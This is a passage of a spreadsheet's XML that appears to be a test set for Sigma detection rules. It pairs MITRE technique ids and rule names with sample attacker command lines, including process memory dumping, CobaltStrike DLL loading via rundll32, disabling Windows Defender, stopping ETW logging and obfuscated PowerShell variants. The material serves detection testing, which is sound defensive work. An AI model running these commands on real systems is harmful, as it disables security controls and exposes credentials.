          <t>dee0a7a3-f200-4112-a99b-952196d81e42</t>
        </is>
      </c>
      <c r="E2162" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe 712 C:\temp\dump.dmp F"ull</t>
        </is>
      </c>
      <c r="F2162" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2162" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2162" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2162" s="43" t="n"/>
      <c r="J2162" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2162" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2163" ht="15.75" customHeight="1" s="42">
      <c r="A2163" s="43" t="inlineStr">
        <is>
          <t>t1036</t>
        </is>
      </c>
      <c r="B2163" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_execution</t>
        </is>
      </c>
      <c r="C2163" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D2163" s="43" t="inlineStr">
        <is>
          <t>dee0a7a3-f200-4112-a99b-952196d81e42</t>
        </is>
      </c>
      <c r="E2163" s="43" t="inlineStr">
        <is>
          <t>DumpMinitool.exe 712 C:\temp\dump.dmp Full</t>
        </is>
      </c>
      <c r="F2163" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2163" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2163" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2163" s="43" t="n"/>
      <c r="J2163" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2163" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2164" ht="15.75" customHeight="1" s="42">
      <c r="A2164" s="43" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B2164" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_x509enrollment</t>
        </is>
      </c>
      <c r="C2164" s="43" t="inlineStr">
        <is>
          <t>Suspicious X509Enrollment - Process Creation</t>
        </is>
      </c>
      <c r="D2164" s="43" t="inlineStr">
        <is>
          <t>114de787-4eb2-48cc-abdb-c0b449f93ea4</t>
        </is>
      </c>
      <c r="E2164" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$clsid = '884e2002-217d-11da-b2a4-000`ne7bbb2b09'; $type = [type]::GetTypeFromCLSID($clsid); $obj = [Activator]::CreateInstance($type)"</t>
        </is>
      </c>
      <c r="F2164" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2164" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2164" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2164" s="43" t="n"/>
      <c r="J2164" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2164" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2165" ht="15.75" customHeight="1" s="42">
      <c r="A2165" s="43" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B2165" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_x509enrollment</t>
        </is>
      </c>
      <c r="C2165" s="43" t="inlineStr">
        <is>
          <t>Suspicious X509Enrollment - Process Creation</t>
        </is>
      </c>
      <c r="D2165" s="43" t="inlineStr">
        <is>
          <t>114de787-4eb2-48cc-abdb-c0b449f93ea4</t>
        </is>
      </c>
      <c r="E2165" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$com = 'X509Enrollment.CBinaryConverter'; $obj = New-Object -ComObject $com"</t>
        </is>
      </c>
      <c r="F2165" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2165" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2165" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2165" s="43" t="n"/>
      <c r="J2165" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2165" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2166" ht="15.75" customHeight="1" s="42">
      <c r="A2166" s="43" t="inlineStr">
        <is>
          <t>t1553.004</t>
        </is>
      </c>
      <c r="B2166" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_x509enrollment</t>
        </is>
      </c>
      <c r="C2166" s="43" t="inlineStr">
        <is>
          <t>Suspicious X509Enrollment - Process Creation</t>
        </is>
      </c>
      <c r="D2166" s="43" t="inlineStr">
        <is>
          <t>114de787-4eb2-48cc-abdb-c0b449f93ea4</t>
        </is>
      </c>
      <c r="E2166" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$com = 'X509Enrollment' + '.' + 'CBinaryConverter'; $obj = New-Object -ComObject $com"</t>
        </is>
      </c>
      <c r="F2166" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2166" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2166" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2166" s="43" t="n"/>
      <c r="J2166" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2166" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2167" ht="15.75" customHeight="1" s="42">
      <c r="A2167" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2167" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C2167" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D2167" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E2167" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe 999</t>
        </is>
      </c>
      <c r="F2167" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2167" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2167" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2167" s="43" t="n"/>
      <c r="J2167" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2167" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2168" ht="15.75" customHeight="1" s="42">
      <c r="A2168" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2168" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C2168" s="43" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D2168" s="43" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E2168" s="43" t="inlineStr">
        <is>
          <t>TrolleyExpress.exe `755`</t>
        </is>
      </c>
      <c r="F2168" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2168" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2168" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2168" s="43" t="n"/>
      <c r="J2168" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2168" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2169" ht="15.75" customHeight="1" s="42">
      <c r="A2169" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2169" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_load_by_rundll32</t>
        </is>
      </c>
      <c r="C2169" s="43" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32</t>
        </is>
      </c>
      <c r="D2169" s="43" t="inlineStr">
        <is>
          <t>ae9c6a7c-9521-42a6-915e-5aaa8689d529</t>
        </is>
      </c>
      <c r="E2169" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe payload.dll,StartW</t>
        </is>
      </c>
      <c r="F2169" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2169" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2169" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2169" s="43" t="n"/>
      <c r="J2169" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2169" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2170" ht="15.75" customHeight="1" s="42">
      <c r="A2170" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2170" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_load_by_rundll32</t>
        </is>
      </c>
      <c r="C2170" s="43" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32</t>
        </is>
      </c>
      <c r="D2170" s="43" t="inlineStr">
        <is>
          <t>ae9c6a7c-9521-42a6-915e-5aaa8689d529</t>
        </is>
      </c>
      <c r="E2170" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe "payload.dll",StartW</t>
        </is>
      </c>
      <c r="F2170" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2170" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2170" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2170" s="43" t="n"/>
      <c r="J2170" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2170" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2171" ht="15.75" customHeight="1" s="42">
      <c r="A2171" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2171" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_cobaltstrike_load_by_rundll32</t>
        </is>
      </c>
      <c r="C2171" s="43" t="inlineStr">
        <is>
          <t>CobaltStrike Load by Rundll32</t>
        </is>
      </c>
      <c r="D2171" s="43" t="inlineStr">
        <is>
          <t>ae9c6a7c-9521-42a6-915e-5aaa8689d529</t>
        </is>
      </c>
      <c r="E2171" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe C:\temp\payload.dll,StartW</t>
        </is>
      </c>
      <c r="F2171" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2171" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2171" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2171" s="43" t="n"/>
      <c r="J2171" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2171" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2172" ht="15.75" customHeight="1" s="42">
      <c r="A2172" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2172" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_installscreensaver</t>
        </is>
      </c>
      <c r="C2172" s="43" t="inlineStr">
        <is>
          <t>Rundll32 InstallScreenSaver Execution</t>
        </is>
      </c>
      <c r="D2172" s="43" t="inlineStr">
        <is>
          <t>15bd98ea-55f4-4d37-b09a-e7caa0fa2221</t>
        </is>
      </c>
      <c r="E2172" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe" desk.cpl,InstallScreenSaver test.scr</t>
        </is>
      </c>
      <c r="F2172" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2172" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2172" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2172" s="43" t="n"/>
      <c r="J2172" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2172" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2173" ht="15.75" customHeight="1" s="42">
      <c r="A2173" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B2173" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_shell32_susp_execution</t>
        </is>
      </c>
      <c r="C2173" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory</t>
        </is>
      </c>
      <c r="D2173" s="43" t="inlineStr">
        <is>
          <t>32b96012-7892-429e-b26c-ac2bf46066ff</t>
        </is>
      </c>
      <c r="E2173" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe shell32.dll,Control_RunDLL payload.dll</t>
        </is>
      </c>
      <c r="F2173" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2173" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2173" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2173" s="43" t="n"/>
      <c r="J2173" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2173" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2174" ht="15.75" customHeight="1" s="42">
      <c r="A2174" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B2174" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ftp_arbitrary_command_execution</t>
        </is>
      </c>
      <c r="C2174" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary Command Execution Via FTP.EXE</t>
        </is>
      </c>
      <c r="D2174" s="43" t="inlineStr">
        <is>
          <t>06b401f4-107c-4ff9-947f-9ec1e7649f1e</t>
        </is>
      </c>
      <c r="E2174" s="43" t="inlineStr">
        <is>
          <t>ftp -s:script.txt</t>
        </is>
      </c>
      <c r="F2174" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2174" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2174" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2174" s="43" t="n"/>
      <c r="J2174" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2174" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2175" ht="15.75" customHeight="1" s="42">
      <c r="A2175" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B2175" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C2175" s="43" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D2175" s="43" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E2175" s="43" t="inlineStr">
        <is>
          <t>runscripthelper.exe surfacecheck script.ps1 C:\Windows\Temp</t>
        </is>
      </c>
      <c r="F2175" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2175" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2175" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2175" s="43" t="n"/>
      <c r="J2175" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2175" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2176" ht="15.75" customHeight="1" s="42">
      <c r="A2176" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B2176" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_runscripthelper</t>
        </is>
      </c>
      <c r="C2176" s="43" t="inlineStr">
        <is>
          <t>Suspicious Runscripthelper.exe</t>
        </is>
      </c>
      <c r="D2176" s="43" t="inlineStr">
        <is>
          <t>eca49c87-8a75-4f13-9c73-a5a29e845f03</t>
        </is>
      </c>
      <c r="E2176" s="43" t="inlineStr">
        <is>
          <t>runscripthelper.exe surfacecheck script.ps1 C:\Windows\Temp\.</t>
        </is>
      </c>
      <c r="F2176" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2176" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2176" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2176" s="43" t="n"/>
      <c r="J2176" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2176" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2177" ht="15.75" customHeight="1" s="42">
      <c r="A2177" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2177" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C2177" s="43" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D2177" s="43" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E2177" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "rm 'HKCR\*\shellex\ContextMenuHandlers\EPP'"</t>
        </is>
      </c>
      <c r="F2177" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2177" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2177" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2177" s="43" t="n"/>
      <c r="J2177" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2177" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2178" ht="15.75" customHeight="1" s="42">
      <c r="A2178" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2178" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C2178" s="43" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D2178" s="43" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E2178" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "rm 'HKCR\*\shellex\ContextMenuHandlers\EPP'"</t>
        </is>
      </c>
      <c r="F2178" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2178" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2178" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2178" s="43" t="n"/>
      <c r="J2178" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2178" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2179" ht="15.75" customHeight="1" s="42">
      <c r="A2179" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2179" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C2179" s="43" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D2179" s="43" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E2179" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "rm HKCR:\*\shellex\ContextMenuHandlers\EPP"</t>
        </is>
      </c>
      <c r="F2179" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2179" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2179" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2179" s="43" t="n"/>
      <c r="J2179" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2179" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2180" ht="15.75" customHeight="1" s="42">
      <c r="A2180" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2180" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C2180" s="43" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D2180" s="43" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E2180" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "rm 'HKCR\*\shellex\ContextMenuHandlers\EPP'" -WindowStyle Hidden</t>
        </is>
      </c>
      <c r="F2180" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2180" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2180" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2180" s="43" t="n"/>
      <c r="J2180" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2180" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2181" ht="15.75" customHeight="1" s="42">
      <c r="A2181" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2181" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_defender_remove_context_menu</t>
        </is>
      </c>
      <c r="C2181" s="43" t="inlineStr">
        <is>
          <t>Windows Defender Context Menu Removed</t>
        </is>
      </c>
      <c r="D2181" s="43" t="inlineStr">
        <is>
          <t>b9e8c7d6-a5f4-4e3d-8b1a-9f0c8d7e6a5b</t>
        </is>
      </c>
      <c r="E2181" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "rm 'HKCR\*\shellex\ContextMenuHandlers\EPP'" -NonInteractive</t>
        </is>
      </c>
      <c r="F2181" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2181" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2181" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2181" s="43" t="n"/>
      <c r="J2181" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2181" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2182" ht="15.75" customHeight="1" s="42">
      <c r="A2182" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2182" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dism_remove</t>
        </is>
      </c>
      <c r="C2182" s="43" t="inlineStr">
        <is>
          <t>Dism Remove Online Package</t>
        </is>
      </c>
      <c r="D2182" s="43" t="inlineStr">
        <is>
          <t>43e32da2-fdd0-4156-90de-50dfd62636f9</t>
        </is>
      </c>
      <c r="E2182" s="43" t="inlineStr">
        <is>
          <t>dism.exe /Online -Disable-Feature /FeatureName:Windows-Defender /NoRestart /Quiet</t>
        </is>
      </c>
      <c r="F2182" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2182" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2182" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2182" s="43" t="n"/>
      <c r="J2182" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2182" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2183" ht="15.75" customHeight="1" s="42">
      <c r="A2183" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2183" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dism_remove</t>
        </is>
      </c>
      <c r="C2183" s="43" t="inlineStr">
        <is>
          <t>Dism Remove Online Package</t>
        </is>
      </c>
      <c r="D2183" s="43" t="inlineStr">
        <is>
          <t>43e32da2-fdd0-4156-90de-50dfd62636f9</t>
        </is>
      </c>
      <c r="E2183" s="43" t="inlineStr">
        <is>
          <t>dism.exe /Online /Disable-Feature /FeatureName:Windows-Defender /Quiet /NoRestart</t>
        </is>
      </c>
      <c r="F2183" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2183" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2183" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2183" s="43" t="n"/>
      <c r="J2183" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2183" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2184" ht="15.75" customHeight="1" s="42">
      <c r="A2184" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2184" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_logman_disable_eventlog</t>
        </is>
      </c>
      <c r="C2184" s="43" t="inlineStr">
        <is>
          <t>Suspicious Windows Trace ETW Session Tamper Via Logman.EXE</t>
        </is>
      </c>
      <c r="D2184" s="43" t="inlineStr">
        <is>
          <t>cd1f961e-0b96-436b-b7c6-38da4583ec00</t>
        </is>
      </c>
      <c r="E2184" s="43" t="inlineStr">
        <is>
          <t>logman.exe stop  "Circular Kernel Context Logger"</t>
        </is>
      </c>
      <c r="F2184" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2184" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2184" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2184" s="43" t="n"/>
      <c r="J2184" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2184" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2185" ht="15.75" customHeight="1" s="42">
      <c r="A2185" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2185" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_ie_features</t>
        </is>
      </c>
      <c r="C2185" s="43" t="inlineStr">
        <is>
          <t>Disabled IE Security Features</t>
        </is>
      </c>
      <c r="D2185" s="43" t="inlineStr">
        <is>
          <t>fb50eb7a-5ab1-43ae-bcc9-091818cb8424</t>
        </is>
      </c>
      <c r="E2185" s="43" t="inlineStr">
        <is>
          <t>New-ItemProperty -Path 'HKCU\Software\Microsoft\Internet Explorer\Main' -PropertyType DWord -Name 'DisableFirstRunCustomize' -Value 2</t>
        </is>
      </c>
      <c r="F2185" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2185" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2185" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2185" s="43" t="n"/>
      <c r="J2185" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2185" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2186" ht="15.75" customHeight="1" s="42">
      <c r="A2186" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2186" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_ie_features</t>
        </is>
      </c>
      <c r="C2186" s="43" t="inlineStr">
        <is>
          <t>Disabled IE Security Features</t>
        </is>
      </c>
      <c r="D2186" s="43" t="inlineStr">
        <is>
          <t>fb50eb7a-5ab1-43ae-bcc9-091818cb8424</t>
        </is>
      </c>
      <c r="E2186" s="43" t="inlineStr">
        <is>
          <t>New-ItemProperty -Path "HKCU\Software\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2 -PropertyType DWord</t>
        </is>
      </c>
      <c r="F2186" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2186" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2186" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2186" s="43" t="n"/>
      <c r="J2186" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2186" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2187" ht="15.75" customHeight="1" s="42">
      <c r="A2187" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2187" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_ie_features</t>
        </is>
      </c>
      <c r="C2187" s="43" t="inlineStr">
        <is>
          <t>Disabled IE Security Features</t>
        </is>
      </c>
      <c r="D2187" s="43" t="inlineStr">
        <is>
          <t>fb50eb7a-5ab1-43ae-bcc9-091818cb8424</t>
        </is>
      </c>
      <c r="E2187" s="43" t="inlineStr">
        <is>
          <t>New-ItemProperty -Path "HKCU\Software\Microsoft\Internet Explorer\Main" -PropertyType DWord -Name "DisableFirstRunCustomize`" -Value 2</t>
        </is>
      </c>
      <c r="F2187" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2187" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2187" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2187" s="43" t="n"/>
      <c r="J2187" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2187" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2188" ht="15.75" customHeight="1" s="42">
      <c r="A2188" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2188" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remove_mppreference</t>
        </is>
      </c>
      <c r="C2188" s="43" t="inlineStr">
        <is>
          <t>Tamper Windows Defender Remove-MpPreference</t>
        </is>
      </c>
      <c r="D2188" s="43" t="inlineStr">
        <is>
          <t>07e3cb2c-0608-410d-be4b-1511cb1a0448</t>
        </is>
      </c>
      <c r="E2188" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.Management.Automation.PowerShell]::Create().AddCommand('Remove-MpPreference').AddParameter('ControlledFolderAccessProtectedFolders', 'C:\').Invoke()"</t>
        </is>
      </c>
      <c r="F2188" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2188" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2188" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2188" s="43" t="n"/>
      <c r="J2188" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2188" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2189" ht="15.75" customHeight="1" s="42">
      <c r="A2189" s="43" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B2189" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remove_mppreference</t>
        </is>
      </c>
      <c r="C2189" s="43" t="inlineStr">
        <is>
          <t>Tamper Windows Defender Remove-MpPreference</t>
        </is>
      </c>
      <c r="D2189" s="43" t="inlineStr">
        <is>
          <t>07e3cb2c-0608-410d-be4b-1511cb1a0448</t>
        </is>
      </c>
      <c r="E2189" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $cmd = 'Remove-MpPreference'; &amp; $cmd -ControlledFolderAccessProtectedFolders 'C:\' }"</t>
        </is>
      </c>
      <c r="F2189" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2189" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2189" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2189" s="43" t="n"/>
